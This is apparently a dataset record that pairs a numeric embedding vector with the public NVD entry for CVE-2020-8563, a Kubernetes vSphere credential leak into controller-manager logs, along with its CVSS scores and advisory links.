0.015813468024134636, -0.017830422148108482, -0.005319012328982353, -0.005014368332922459, 0.0004396763979457319, 0.01690598390996456, -0.008502015843987465, 0.010287858545780182, -0.005861768499016762, 0.027032768353819847, 0.018992969766259193, 0.007234416902065277, -0.004068921785801649, -0.015407277271151543, 0.024357503280043602, -0.02171025425195694, 0.022298531606793404, -0.004937331657856703, -0.006971792783588171, 0.0018313649343326688, -0.020519690588116646, 0.014454826712608337, 0.0213460810482502, 0.0036172084510326385, 0.004482117015868425, 0.015407277271151543, -0.01052597165107727, 0.008249896578490734, 0.009615541435778141, 0.019483201205730438, 0.0029396384488791227, -0.005963316652923822, 0.01854475773870945, 0.0018296141643077135, -0.017256150022149086, -0.019651280716061592, -0.014833005145192146, 0.000779555703047663, 0.014720953069627285, 0.02152816765010357, -0.004082928411662579, 0.0096435546875, -0.011891616508364677, 0.0013323792954906821, 0.0029168776236474514, -0.0193291287869215, -0.014987078495323658, 0.011730540543794632, 0.00938443187624216, -0.008354946039617062, 0.010476948693394661, -0.00528749730437994, -0.010659034363925457, -0.01696201041340828, -0.006450046319514513, 0.018978964537382126, 0.012626963667571545, -0.010287858545780182, 0.007255426608026028, 0.015393270179629326, -0.0008819790673442185, -0.0036977464333176613, -0.009300392121076584, -0.016737904399633408, -0.011737543158233166, -0.0074515193700790405, -0.004832282196730375, 0.004944335203617811, -0.011625491082668304, 0.012402857653796673, 0.0028240839019417763, 0.009209349751472473, -0.009783620946109295, -0.025660119950771332, -0.03801395371556282, -0.011737543158233166, -0.0028118279296904802, -0.009321402758359909, -0.009076287038624287, 0.004244004376232624, -0.013236251659691334, -0.0057952371425926685, -0.012956119142472744, -0.006880749948322773, -0.013012145645916462, 0.01064502727240324, -0.013313287869095802, 0.0016440264880657196, -0.00019215325301047415, 0.022480618208646774, -0.013341301120817661, -0.005269988905638456, -0.006173415575176477, 0.01439880020916462, 0.01788644678890705, 0.012521914206445217, -0.017550289630889893, 0.014272741042077541, 0.0022410585079342127, -0.022620683535933495, 0.01662585325539112, -0.015015091747045517, -0.01220676489174366, 0.00962254498153925, 0.004527638200670481, -0.03521263226866722, -0.013957591727375984, -0.008635078556835651, 0.013782509602606297, 0.02273273654282093, -0.0038658257108181715, 0.02133207581937313, -0.016990024596452713, -0.00002615297671582084, -0.0009314399212598801, -0.007696635089814663, -0.009258372709155083, -0.025464026257395744, 0.012339827604591846, 0.026766641065478325, 0.023657172918319702, -0.008985243737697601, -0.005014368332922459, -0.0003604514931794256, 0.015729429200291634, 0.00497234845533967, 0.0023968820460140705, -0.020673764869570732, 0.023222967982292175, -0.0093143992125988, -0.002913376083597541, 0.0003370341728441417, 0.012556931003928185, -0.017718369141221046, 0.007171386852860451, -0.0005029250169172883, -0.012935109436511993, -0.011233305558562279, -0.008333936333656311, 0.018516745418310165, 0.002207792829722166, -0.001688672578893602, -0.006183920428156853, 0.005150932818651199, -0.0042580110020935535, -0.0014759470941498876, -0.014973071403801441, -0.0002462100237607956, -0.022760750725865364, -0.01914704218506813, -0.008649084717035294, 0.017970487475395203, 0.012038685381412506, 0.0006154156872071326, -0.007871718145906925, 0.009699581190943718, -0.023461081087589264, 0.00030551929376088083, -0.011779563501477242, 0.008459995500743389, 0.015547342598438263, -0.010301865637302399, -0.002494928427040577, 0.014987078495323658, -0.001774463104084134, -0.00002295224658155348, -0.018390685319900513, -0.0037852877285331488, 0.0027522998861968517, -0.002037962432950735, -0.011191285215318203, -0.007325459737330675, -0.012935109436511993, -0.004096935037523508, 0.010610011406242847, -0.009776617400348186, 0.0008902954868972301, 0.01626168005168438, -0.0099727101624012, 0.009398438967764378, -0.0028520969208329916, -0.015435289591550827, 0.008067809976637363, -0.003956868778914213, 0.020799823105335236, -0.018390685319900513, 0.00938443187624216, 0.009678571484982967, -0.006513075903058052, -0.014055638574063778, 0.008158853277564049, -0.023825252428650856, -0.0011179029243066907, 0.005480088293552399, -0.0005484465509653091, -0.006499069277197123, 0.015267211012542248, 0.03372792899608612, -0.0023040883243083954, 0.00548709137365222, -0.007262430153787136, -0.010238835588097572, -0.018530752509832382, -0.01120529230684042, -0.012234778143465519, 0.019357142969965935, -0.018950950354337692, 0.003778284415602684, -0.004762249067425728, -0.006450046319514513, -0.0031952590215951204, 0.002596476348116994, -0.003687241580337286, -0.0022638191003352404, -0.014608900062739849, -0.018054526299238205, -0.024819722399115562, -0.007955757901072502, 0.00815184973180294, -0.00841097254306078, -0.015547342598438263, 0.012178751640021801, 0.02129005454480648, 0.002691020956262946, -0.006915766280144453, 0.023321013897657394, -0.015673402696847916, 0.0010040992638096213, -0.019693301990628242, 0.01064502727240324, 0.017214130610227585, -0.00018525937048252672, 0.025015814229846, 0.007486535701900721, -0.002169274492189288, -0.011044216342270374, -0.004184476099908352, -0.0034193650353699923, 0.004979351535439491, 0.024987801909446716, -0.0032460330985486507, 0.009209349751472473, -0.020043466240167618, -0.021878333762288094, 0.019777340814471245, -0.028027236461639404, 0.005024873185902834, 0.002691020956262946, -0.0010539977811276913, -0.010238835588097572, -0.00019674916984513402, 0.006730178836733103, 0.017774395644664764, 0.012283802032470703, -0.016611846163868904, -0.0036242117639631033, -0.02603829838335514, 0.0024634134024381638, 0.0010040992638096213, 0.022116445004940033, -0.0074515193700790405, 0.012451880611479282, -0.012823056429624557, 0.0013700220733880997, -0.0013743991730734706, -0.005038879811763763, 0.003573437687009573, 0.0017324432265013456, -0.008277909830212593, -0.015827475115656853, 0.0185867790132761, -0.00430703442543745, 0.022718729451298714, 0.015085124410688877, -0.004163466393947601, 0.0012106967624276876, -0.004510130267590284, 0.00400589220225811, 0.03521263226866722, -0.011394381523132324, -0.03322369232773781, -0.00750054232776165, 0.020855849608778954, 0.007549565751105547, 0.009517495520412922, 0.011366368271410465, -0.0039113471284508705, -0.003445627400651574, 0.019357142969965935, 0.00439107371494174, -0.0028450938407331705, 0.00272603752091527, -0.0014172943774610758, 0.029525944963097572, -0.001451435498893261, -0.01004274282604456, -0.009153323248028755, -0.007920741103589535, 0.004145957995206118, 0.007927744649350643, 0.00450662849470973, -0.0033475810196250677, -0.007374483160674572, 0.018376680091023445, -0.014412807300686836, 0.007444515824317932, -0.015365256927907467, -0.006271461956202984, -0.0018873914377763867, -0.006313481833785772, 0.005231470800936222, 0.011800573207437992, 0.01374749280512333, -0.03392402082681656, 0.007255426608026028, 0.013250257819890976, -0.012732013128697872, -0.02581419236958027, 0.007297446485608816, -0.006516577675938606, 0.0007012061541900039, -0.0009165579103864729, -0.021079955622553825, -0.01854475773870945, -0.035520777106285095, 0.007843704894185066, -0.007087347563356161, -0.004394575487822294, -0.004937331657856703, 0.0128370625898242, -0.004594170022755861, -0.003760776249691844, 0.002288330812007189, -0.026108330115675926, -0.023867271840572357, -0.016415752470493317, -0.0013323792954906821, 0.020785817876458168, -0.02105194330215454, -0.014181697741150856, -0.022102439776062965, 0.005613151006400585, 0.006320484913885593, 0.002085234737023711, 0.013208238407969475, -0.004576661624014378, -0.016107607632875443, -0.006225940305739641, -0.004282522480934858, 0.003949865698814392, 0.0011835589539259672, 0.02110796980559826, -0.0056236558593809605, -0.004310535732656717, 0.010133786126971245, -0.013411333784461021, -0.013264264911413193, 0.021444128826260567, -0.009349416010081768, -0.006513075903058052, 0.008158853277564049, -0.005161437671631575, -0.011660506948828697, 0.001634396961890161, -0.0039008422754704952, -0.017998499795794487, -0.0077456580474972725, 0.005112414713948965, -0.0100147295743227, -0.022536644712090492, -0.01988939382135868, 0.009419448673725128, -0.003928855527192354, 0.030954619869589806, -0.006933274678885937, 0.029525944963097572, -0.0017998500261455774, 0.017690354958176613, -0.022298531606793404, -0.012073702178895473, -0.02451157756149769, -0.002645499538630247, -0.00015823097783140838, 0.00462218327447772, -0.0009673318709246814, -0.006366006564348936, 0.016877971589565277, -0.021500155329704285, 0.00751454895362258, 0.012851069681346416, 0.0017788400873541832, -0.02865753509104252, -0.009370425716042519, 0.0343722328543663, -0.008887197822332382, -0.020939890295267105, 0.00532251363620162, -0.02259267121553421, -0.0044611068442463875, -0.006078870967030525, -0.0023443573154509068, 0.010056749917566776, -0.0046326881274580956, -0.016275687143206596, -0.0034491289407014847, -0.009377429261803627, -0.017788400873541832, 0.011982659809291363, -0.020981909707188606, 0.012227775529026985, 0.010981186293065548, 0.0005874024354852736, 0.005375038832426071, 0.004713226109743118, 0.006982297636568546, 0.004513631574809551, 0.009587528184056282, 0.016891978681087494, -0.003181252395734191, 0.0007620474207215011, -0.019287109375, -0.011632493697106838, 0.024259457364678383, -0.004818275570869446, -0.005315510556101799, -0.008971236646175385, -0.014973071403801441, 0.009405442513525486, -0.02008548565208912, 0.006646139081567526, -0.006187422201037407, -0.02255064994096756, -0.019161049276590347, 0.0010207321029156446, -0.013334297575056553, 0.021318068727850914, -0.00006702384416712448, -0.0005773351876996458, 0.02166823297739029, -0.008158853277564049, -0.012647973373532295, -0.009048273786902428, -0.003928855527192354, 0.01150643453001976, -0.00098133843857795, -0.0243154838681221, 0.013803519308567047, -0.029553959146142006, 0.020197538658976555, 0.001363018760457635, 0.002559708897024393, -0.020715784281492233, -0.00019226268341299146, 0.01728416234254837, 0.018376680091023445, -0.003247783984988928, -0.0060613625682890415, 0.01241686474531889, 0.02091187611222267, -0.024399524554610252, -0.003984882030636072, 0.015071118250489235, -0.011261318810284138, 0.02451157756149769, 0.010567991062998772, -0.012865075841546059, -0.00580224022269249, 0.017858434468507767, 0.016051581129431725, -0.014384794048964977, 0.0062539535574615, -0.012339827604591846, -0.02157018706202507, -0.002466915175318718, 0.00257896794937551, -0.01276702992618084, 0.010729067027568817, -0.006309980060905218, -0.019175056368112564, 0.008537031710147858, -0.009825640358030796, 0.010532974265515804, 0.026864688843488693, 0.0058232503943145275, 0.020197538658976555, -0.013656449504196644, 0.00994469691067934, 0.005294500384479761, -0.0019574244506657124, 0.003704749746248126, -0.0010076009202748537, -0.010813106782734394, -0.006898257881402969, 0.012746020220220089, -0.008873190730810165, -0.00969257764518261, 0.0059703197330236435, -0.0037187563721090555, -0.0163597259670496, 0.0071328687481582165, -0.03243932127952576, 0.037845876067876816, -0.013733486644923687, -0.008957230485975742, -0.0014199205907061696, -0.003620709991082549, 0.016233667731285095, 0.019455188885331154, -0.034120116382837296, 0.002533446531742811, -0.01672389917075634, 0.006506072822958231, 0.02385326661169529, 0.012886086478829384, -0.007367479614913464, 0.00838295929133892, -0.024385517463088036, -0.019623268395662308, 0.00024380264221690595, -0.011429398320615292, -0.005305005703121424, 0.0006648765411227942, -0.01848873309791088, -0.038126006722450256, 0.015113137662410736, -0.008193870075047016, -0.011121252551674843, 0.008396965451538563, 0.011975656263530254, -0.0357728935778141, 0.016149627044796944, -0.002617486286908388, -0.014847012236714363, -0.0005545744206756353, -0.01313820481300354, -0.00808181706815958, -0.004177473019808531, 0.013523386791348457, 0.01059600431472063, 0.02449757046997547, 0.011674514040350914, -0.0003357210662215948, 0.0031234752386808395, -0.013285274617373943, -0.02417541854083538, 0.0007068963604979217, 0.015813468024134636, -0.019721314311027527, -0.000010238233699055854, 0.006467554718255997, 0.008474002592265606, -0.008424978703260422, 0.02603829838335514, 0.025085847824811935, 0.022326543927192688, -0.0014181698206812143, 0.003704749746248126, -0.025828199461102486, -0.0013752744998782873, -0.0034578831400722265, -0.0027225357480347157, 0.01621966063976288, -0.020141512155532837, -0.009202346205711365, -0.00002572894845798146, 0.010708057321608067, -0.030926605686545372, 0.0035226638428866863, 0.003963872324675322, -0.008305923081934452, -0.010350888594985008, 0.005966817960143089, 0.01734018884599209, 0.010603007860481739, -0.012374844402074814, 0.01304716244339943, -0.011653504334390163, 0.016135619953274727, 0.0075705754570662975, 0.0031234752386808395, -0.012914099730551243, -0.008551038801670074, -0.012802046723663807, -0.025688132271170616, 0.015687409788370132, -0.00034294321085326374, 0.013558403588831425, 0.008537031710147858, -0.006138399243354797, 0.0008828544523566961, 0.004944335203617811, -0.016471778973937035, -0.005924798082560301, -0.008438985794782639, 0.007983771152794361, 0.009356418624520302, -0.005035378038883209, -0.014356780797243118, -0.004187977872788906, -0.014272741042077541, 0.00040225248085334897, 0.00013459482579492033, -0.01802651397883892, 0.0007778048748150468, -0.023881278932094574, -0.018656810745596886, -0.0008789151324890554, -0.011982659809291363, 0.0371735580265522, -0.007822694256901741, 0.00966456439346075, 0.018656810745596886, 0.02058972418308258, 0.025043828412890434, -0.016793930903077126, 0.014706945978105068, 0.020393632352352142, -0.002568463096395135, 0.005147431045770645, 0.003496401244774461, -0.013446350581943989, -0.008558042347431183, -0.009839647449553013, -0.0023303506895899773, 0.01579946279525757, 0.009132313542068005, -0.024987801909446716, 0.002923880936577916, -0.001453186385333538, 0.008523025549948215, 0.014847012236714363, -0.00014247353828977793, -0.02986210398375988, 0.0051019093953073025, 0.0016203903360292315, 0.010778090916574001, -0.006898257881402969, -0.027102800086140633, 0.007843704894185066, -0.018152574077248573, -0.025141874328255653, -0.0009366924059577286, 0.0005269988905638456, -0.010834116488695145, 0.009447461925446987, -0.0020537199452519417, 0.0017762138741090894, -0.01812455989420414, -0.012682990171015263, 0.005108912941068411, 0.015729429200291634, 0.018810885027050972, -0.032215215265750885, 0.006635633762925863, 0.001019856659695506, 0.004335047211498022, -0.005241975653916597, -0.003638218389824033, -0.004818275570869446, -0.0037257596850395203, 0.008389962837100029, -0.005017870105803013, 0.0024213935248553753, 0.0011800572974607348, -0.015897508710622787, -0.0200294591486454, -0.002606981201097369, 0.00006795396620873362, 0.01724214293062687, 0.005784732289612293, 0.03661329299211502, 0.012052692472934723, 0.00450662849470973, -0.017578301951289177, 0.015519329346716404, 0.003394853323698044, -0.0019959427881985903, -0.0017245644703507423, -0.01157646719366312, -0.011674514040350914, 0.011233305558562279, 0.006691660266369581, -0.027635052800178528, 0.009279382415115833, 0.007640608586370945, -0.025660119950771332, 0.03336375579237938, 0.0027347917202860117, -0.002941389102488756, 0.013901565223932266, 0.0015328489243984222, 0.014762972481548786, 0.011009199544787407, 0.012521914206445217, -0.0008185115875676274, -0.0028976185712963343, 0.001552983419969678, 0.010413918644189835, -0.01766234263777733, -0.007906734012067318, 0.003184754168614745, 0.019651280716061592, -0.01794247329235077, 0.012907096184790134, 0.02511386200785637, -0.00878214742988348, -0.004485618323087692, -0.009468471631407738, -0.0028135788161307573, 0.0054205600172281265, 0.008123836480081081, 0.018236612901091576, 0.0028923661448061466, 0.012682990171015263, 0.007269433233886957, -0.010610011406242847, 0.0047727543860673904, 0.00638351496309042, -0.0031427342910319567, -0.0028345887549221516, 0.000509928329847753, 0.015253203921020031, -0.0054135569371283054, -0.028125284239649773, 0.007094350643455982, -0.0049863550812006, 0.000543631729669869, 0.006716172210872173, 0.015477309934794903, 0.003265292150899768, -0.020113499835133553, 0.0008622822351753712, -0.0023163440637290478, 0.0048988135531544685, -0.01022482942789793, 0.011919629760086536, 0.011814580298960209, 0.0157014150172472, -0.014706945978105068, -0.0032040132209658623, 0.02785915695130825, -0.006124392617493868, -0.0015538588631898165, -0.004905817098915577, -0.022186478599905968, 0.0013236250961199403, 0.0143007542937994, -0.0021815302316099405, 0.02022555284202099, 0.011583470739424229, -0.011303338222205639, -0.007857711054384708, -0.024441543966531754, 0.0024966790806502104, -0.008978240191936493, -0.018950950354337692, 0.005070394836366177, -0.003426368348300457, -0.013523386791348457, 0.006281966809183359, -0.008368952199816704, -0.012311815284192562, -0.006295973435044289, 0.01308918185532093, -0.0006780077237635851, -0.0031707475427538157, 0.00144705839920789, 0.00470622256398201, 0.00815184973180294, -0.00211324798874557, -0.006019342690706253, -0.004965344909578562, -0.008053803816437721, 0.013166218064725399, 0.015099131502211094, -0.007640608586370945, 0.00999371986836195, 0.006579607725143433, 0.012654976919293404, 0.02185031957924366, -0.02795720472931862, -0.02571614645421505, 0.019119029864668846, -0.002158769639208913, 0.0020712283439934254, -0.002727788407355547, -0.006754690315574408, 0.00389033742249012, 0.01621966063976288, 0.019441181793808937, 0.005742712412029505, 0.004583664704114199, -0.017410222440958023, 0.015575355850160122, 0.016471778973937035, -0.02259267121553421, -0.006064864341169596, -0.019735321402549744, -0.009776617400348186, 0.014524860307574272, 0.015729429200291634, 0.023405054584145546, -0.0007344718906097114, 0.011163271963596344, 0.005084401462227106, -0.019034991040825844, -0.014055638574063778, 0.015295224264264107, 0.0036522250156849623, -0.003620709991082549, 0.01094616949558258, -0.005024873185902834, 0.017298169434070587, 0.0014741962077096105, 0.00813084002584219, -0.025029821321368217, -0.0036172084510326385, 0.023236975073814392, -0.014013618230819702, -0.010504961013793945, -0.00746552599593997, 0.012907096184790134, 0.013894562609493732, -0.020757803693413734, -0.0031707475427538157, 0.010420922189950943, 0.006092877592891455, -0.02972203679382801, 0.007094350643455982, -0.017032044008374214, 0.01152744423598051, -0.029694024473428726, 0.004293027799576521, -0.021416114643216133, 0.00047841345076449215, 0.014875025488436222, 0.012101715430617332, 0.0021114973351359367, 0.004352555610239506, -0.005714699160307646, 0.008046800270676613, -0.00810282677412033, 0.01714409701526165, 0.012451880611479282, 0.006709168665111065, -0.006600617431104183, -0.010841120034456253, 0.0017884697299450636, 0.002708529122173786, 0.004100436810404062, 0.014524860307574272, -0.0047167278826236725, -0.0033108138013631105, -0.0036977464333176613, 0.00866309180855751, 0.015603369101881981, -0.0018873914377763867, 0.011891616508364677, -0.013131202198565006, 0.009153323248028755, 0.006856238003820181, 0.028769588097929955, -0.010589000768959522, 0.03005819581449032, 0.017872441560029984, 0.032495345920324326, 0.023657172918319702, 0.016275687143206596, 0.004268515855073929, 0.010778090916574001, 0.011646500788629055, -0.0037537729367613792, 0.019301116466522217, -0.001927660428918898, -0.010441931895911694, 0.003316066227853298, -0.02086985670030117, -0.025169888511300087, 0.010301865637302399, -0.020295586436986923, 0.024329490959644318, 0.010792097076773643, 0.01062401756644249, -0.0007699261186644435, -0.014384794048964977, 0.011058222502470016, 0.017270157113671303, 0.010771087370812893, -0.029385879635810852, 0.01728416234254837, -0.021121975034475327, -0.017900453880429268, 0.010441931895911694, -0.002305838977918029, -0.016275687143206596, -0.014265737496316433, -0.0032250231597572565, -0.013208238407969475, -0.016457773745059967, -0.009139316156506538, 0.0037852877285331488, 0.017256150022149086, -0.0032828005496412516, 0.007472529076039791, 0.013166218064725399, -0.016527805477380753, -0.0023583639413118362, 0.00929338950663805, 0.005315510556101799, -0.003659228328615427, -0.016331713646650314, -0.007822694256901741, 0.02841942198574543, -0.017872441560029984, 0.019315121695399284, -0.007794681470841169, -0.021794293075799942, 0.009825640358030796, 0.0016510298009961843, -0.006239946931600571, -0.024147404357790947, -0.009496484883129597, -0.010084763169288635, -0.003977878950536251, 0.01094616949558258, -0.004107439890503883, 0.011947643011808395, -0.00334232859313488, -0.0020257066935300827, 0.007178390398621559, -0.005812745541334152, 0.041571635752916336, -0.0005033627385273576, 0.008263902738690376, -0.003722257912158966, 0.010799100622534752, -0.010196816176176071, -0.0060333493165671825, 0.003237278899177909, 0.013516384176909924, -0.017060058191418648, 0.0030656978487968445, -0.013607426546514034, -0.0005169316427782178, 0.006015841383486986, 0.029637997969985008, -0.024567604064941406, -0.022144459187984467, 0.0026490010786801577, -0.012682990171015263, -0.02030959166586399, 0.011079233139753342, 0.004415585659444332, -0.0150010846555233, -0.02613634429872036, -0.0024038853589445353, 0.0035419228952378035, 0.005003863479942083, -0.011100242845714092, 0.013243255205452442, 0.01974932663142681, 0.022802770137786865, 0.028671542182564735, -0.004272017627954483, -0.010182809084653854, -0.013817526400089264, 0.002407386898994446, -0.0024791709147393703, -0.026668595150113106, -0.012570937164127827, 0.00593880470842123, 0.025029821321368217, -0.003286302089691162, -0.0025929745752364397, -0.0037642777897417545, 0.0009804631117731333, -0.007055832538753748, -0.022676710039377213, 0.015855489298701286, 0.00012901406444143504, -0.0007567949360236526, -0.002503682393580675, -0.00047928886488080025, 0.0031759999692440033, -0.022060418501496315, -0.013516384176909924, -0.001093391445465386, 0.006380013190209866, -0.003275797236710787, 0.015309230424463749, 0.013530390337109566, 0.012360838241875172, 0.015645388513803482, -0.0011152767110615969, -0.01339032407850027, -0.00462218327447772, 0.00904127024114132, 0.008971236646175385, 0.0021255039609968662, 0.031430844217538834, -0.0018558765295892954, -0.0020309591200202703, 0.03232726827263832, -0.008887197822332382, 0.0026209878269582987, 0.003025428857654333, 0.018292639404535294, -0.022158466279506683, 0.000987466424703598, -0.007353472989052534, 0.0242734644562006, -0.0033458301331847906, -0.004979351535439491, -0.0051264213398098946, -0.020323598757386208, 0.012998138554394245, 0.020015453919768333, -0.0078507075086236, -0.01425173133611679, -0.0038027961272746325, 0.005280493758618832, 0.0029343857895582914, -0.010504961013793945, 0.0058232503943145275, -0.00302717974409461, 0.02325098216533661, 0.014622906222939491, -0.00719940010458231, -0.0023163440637290478, 0.003527916269376874, 0.016289694234728813, -0.0028328378684818745, 0.028587501496076584, 0.01746624894440174, -0.004464608617126942, -0.0023601145949214697, -0.007605592254549265, -0.01210871897637844, 0.00320926564745605, 0.015715422108769417, 0.0012238280614838004, -0.016555819660425186, 0.01253592036664486, -0.014608900062739849, -0.011128256097435951, 0.00843198224902153, -0.000453901884611696, 0.02701876126229763, -0.005868771579116583, 0.0016247673192992806, 0.002782064024358988, -0.031935084611177444, -0.020183533430099487, 0.0063449968583881855, 0.004016397055238485, 0.00911130290478468, -0.02250863052904606, -0.010848123580217361, -0.004685212858021259, 0.007444515824317932, 0.0017849680734798312, -0.004643192980438471, -0.00939143542200327, -0.00934241246432066, 0.0192450899630785, 0.0077456580474972725, 0.010897146537899971, 0.019091017544269562, -0.00901325698941946, 0.007955757901072502, -0.01878287084400654, 0.01676591858267784, 0.005192952696233988, -0.014636913314461708, 0.014510853216052055, -0.009958703070878983, 0.011023206636309624, 0.016877971589565277, -0.006982297636568546, 0.01920306868851185, 0.004615179728716612, 0.015351250767707825, -0.025828199461102486, -0.016779925674200058, 0.01458088681101799, 0.014861018396914005, -0.008088820613920689, 0.0008001279202289879, -0.0009988467209041119, -0.018320653587579727, 0.005963316652923822, -0.00716438377276063, -0.0027698082849383354, 0.012374844402074814, 0.00018919873400591314, 0.010112776421010494, 0.009580524638295174, -0.017032044008374214, 0.00904127024114132, 0.018642805516719818, -0.008207876235246658, 0.003499903017655015, 0.006618125829845667, -0.0014216714771464467, -0.0032145183067768812, -0.003683739807456732, -0.004800767172127962, 0.0031497376039624214, -0.027410946786403656, -0.005760220345109701, 0.00515793589875102, 0.0012492149835452437, -0.02469366230070591, 0.006730178836733103, 0.007724648341536522, -0.0034753913059830666, 0.010890142992138863, -0.013229248113930225, 0.010392908938229084, -0.008046800270676613, -0.013173221610486507, 0.012823056429624557, 0.01032287534326315, 0.0048918104730546474, 0.029974156990647316, -0.013915572315454483, 0.008270906284451485, -0.017298169434070587, -0.022298531606793404, 0.0065480927005410194, -0.00023285998031497002, -0.015225190669298172, 0.0019101521465927362, -0.03947064280509949, -0.012977128848433495, 0.003407109063118696, 0.006488564424216747, 0.00422649597749114, 0.009034266695380211, -0.00450662849470973, 0.0025929745752364397, -0.021780285984277725, -0.00019105899264104664, 0.0006359878461807966, 0.001336756395176053, -0.008270906284451485, 0.01896495744585991, 0.009930689819157124, 0.002363616367802024, -0.019651280716061592, 0.04843487590551376, -0.009349416010081768, -0.014384794048964977, 0.009258372709155083, 0.005087902769446373, 0.00656910240650177, -0.009447461925446987, -0.029329853132367134, -0.013964595273137093, 0.013285274617373943, -0.0011030209716409445, -0.008831171318888664, 0.004065420012921095, -0.015267211012542248, -0.000895985693205148, -0.007605592254549265, -0.003331823507323861, 0.015393270179629326, -0.019217075780034065, -0.013782509602606297, 0.005963316652923822, -0.020337605848908424, 0.021458134055137634, -0.0035436737816780806, -0.007325459737330675, 0.014636913314461708, -0.007409499492496252, -0.013208238407969475, 0.014342773705720901, -0.03605302795767784, 0.0328034944832325, -0.013376317918300629, -0.007696635089814663, 0.007633605506271124, -0.0003740203974302858, 0.004562654998153448, -0.00073972437530756, 0.010490954853594303, -0.008866187185049057, -0.02776111103594303, 0.008768141269683838, 0.009258372709155083, -0.00580224022269249, 0.0021079955622553825, 0.009846650995314121, -0.013334297575056553, -0.006593614351004362, 0.0003676736378110945, 0.0033755942713469267, -0.014265737496316433, 0.00017694295092951506, 0.005613151006400585, -0.00016227977175731212, 0.01850273832678795, 0.0043980772607028484, -0.005984326358884573, -0.01644376665353775, -0.010757080279290676, 0.0023443573154509068, -0.020463664084672928, -0.005718200467526913, -0.015463302843272686, -0.024357503280043602, -0.0013638942036777735, -0.017494263127446175, 0.009048273786902428, 0.015407277271151543, -0.0023285998031497, -0.019259095191955566, 0.011051219888031483, -0.010105772875249386, -0.018712837249040604, 0.007073340937495232, 0.013859545812010765, -0.020617738366127014, -0.03154289722442627, 0.01332029141485691, 0.015673402696847916, -0.0073604765348136425, -0.013887559063732624, -0.0031584918033331633, 0.008999249897897243, -0.012830059975385666, -0.00866309180855751, -0.0118075767531991, -0.022018399089574814, -0.021500155329704285, -0.0020414642058312893, -0.016331713646650314, 0.03005819581449032, -0.0008504641591571271, 0.01966528780758381, -0.02865753509104252, -0.0075075458735227585, -0.005227969028055668, -0.01612161472439766, -0.011135258711874485, 0.006190923973917961, -0.005227969028055668, -0.0001965303235920146, 0.001507462002336979, 0.029666010290384293, -0.025884225964546204, -0.0027400441467761993, 0.022158466279506683, -0.01371947955340147, -0.014622906222939491, 0.00030551929376088083, -0.018880916759371758, -0.004748242441564798, 0.015491316094994545, -0.002197287743911147, -0.01938515529036522, 0.0001306554622715339, 0.0036907431203871965, -0.0013673958601430058, 0.016275687143206596, 0.019175056368112564, 0.013894562609493732, 0.000028314154405961744, 0.0012605953961610794, -0.010021733120083809, 0.023166941478848457, 0.024637635797262192, 0.002717283321544528, -0.0032320264726877213, 0.02315293438732624, 0.013159215450286865, 0.0017455744091421366, -0.002130756387487054, 0.02613634429872036, -0.018936943262815475, 0.0017411973094567657, 0.009230359457433224, 0.011646500788629055, 0.013061168603599072, -0.011611483991146088, 0.00469221593812108, 0.010539977811276913, -0.007129366975277662, 0.005382041912525892, 0.03764978051185608, -0.008642081171274185, 0.009552511386573315, -0.007584582082927227, 0.0070138126611709595, -0.016051581129431725, 0.008922213688492775, 0.006022844463586807, -0.018950950354337692, 0.0314868725836277, 0.000190840131836012, 0.026010284200310707, 0.013866549357771873, -0.017760388553142548, 0.004338548984378576, 0.008326932787895203, 0.015463302843272686, 0.00036920563434250653, -0.0008325182134285569, -0.01704605109989643, 0.0026595061644911766, 0.0014847011771053076, 0.015407277271151543, 0.0011599228018894792, 0.02235455811023712, 0.0025527055840939283, -0.022046413272619247, 0.017620321363210678, -0.0022970850113779306, -0.007255426608026028, 0.005108912941068411, 0.015645388513803482, -0.00866309180855751, 0.0019784343894571066, 0.005340022034943104, -0.003316066227853298, -0.0075355591252446175, 0.0314028300344944, -0.005984326358884573, 0.017396215349435806, 0.006127894390374422, -0.0050108665600419044, 0.009881666861474514, 0.038658257573843, 0.009118306450545788, -0.01607959344983101, -0.006674152333289385, 0.003032432170584798, 0.009468471631407738, -0.003004418918862939, -0.029946142807602882, 0.011891616508364677, 0.0049863550812006, -0.004478615242987871, 0.03252336010336876, 0.011121252551674843, 0.009839647449553013, 0.033139653503894806, -0.013523386791348457, 0.0076546152122318745, -0.011926633305847645, -0.013852542266249657, 0.01064502727240324 ]
1,722
CVE-2020-8563
2020-12-07T22:15:21.197000
In Kubernetes clusters using VSphere as a cloud provider, with a logging level set to 4 or above, VSphere cloud credentials will be leaked in the cloud controller manager's log. This affects < v1.19.3.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 2.1, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 4.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1, "impactScore": 3.6, "source": "jordan@liggitt.net", "type": "Secondary" } ] }
[ { "source": "jordan@liggitt.net", "tags": [ "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/95621" }, { "source": "jordan@liggitt.net", "tags": [ "Mailing List", "Patch", "Third Party Advisory" ], "url": "https://groups.google.com/g/kubernetes-security-discuss/c/vm-HcrFUOCs/m/36utxAM5CwAJ" }, { "source": "jordan@liggitt.net", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20210122-0006/" } ]
